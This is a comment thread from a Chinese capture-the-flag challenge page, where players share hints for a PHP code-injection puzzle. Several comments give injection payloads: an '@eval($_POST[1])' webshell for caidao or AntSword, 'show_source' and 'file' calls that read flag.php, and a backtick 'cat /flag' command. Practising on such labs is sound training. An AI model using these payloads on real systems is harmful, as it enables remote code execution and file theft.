评分(12)
解题动态
Hogan 攻破了该题 1小时前
sorry123 攻破了该题 3小时前
xiaolili 攻破了该题 4小时前
ljjbit 攻破了该题 8小时前
墨尘 攻破了该题 9小时前
booku 攻破了该题 10小时前
15306829633 攻破了该题 11小时前
CHT 攻破了该题 11小时前
河马 攻破了该题 12小时前
Mr.Cyber 攻破了该题 13小时前
聪仔草莓51 攻破了该题 15小时前
pleonexia123 攻破了该题 15小时前
wsx68696 攻破了该题 1天前
lipingctf 攻破了该题 1天前
H1lla1n 攻破了该题 1天前
liyimanfan 攻破了该题 1天前
Yun1217 攻破了该题 2天前
你倒过来读看看呢 攻破了该题 2天前
jvfnvd.vl 攻破了该题 2天前
评论
Fitz_临风 4年前
举报
读取文件内容的函数: * show_source * highlight_file * file * file_get_contents + 查看源码(如果为php文件的话) * system('cat ***’) + 查看源码(如果为php文件的话) * system('more ***’) + 查看源码(如果为php文件的话) * system(’tac ***’) 逆序输出
max39 4年前
举报
构造 ?hello=@eval($_POST[1]) 上caidao或antsword
bk201 4年前
举报
system('command') bypass
system 4年前
举报
http://114.67.246.176:17326/ 我怀疑平台的并发没有做好,为什么我的这一题出来的是之前的 $what=$_GET['what'];<br> echo $what;<br> if($what=='flag')<br> echo 'flag{****}';<br>
200200 4年前
举报
nonono
l03h11x28 4年前
举报
这题是不是不能做了啊 卧槽 为啥我不显示 坑我两块钱 rnm退钱!!!
118234 4年前
举报
`cat /flag`
luoyao 4年前
举报
?hello=file("flag.php")
luyisie 4年前
举报
file // show_source // highlight_file
wwgy9981 4年前
举报
flag = 'Too Young Too Simple‘
kavin 4年前
举报
明白了原理,用bp搞了一轮,发现hello=show_source('flag.php')可行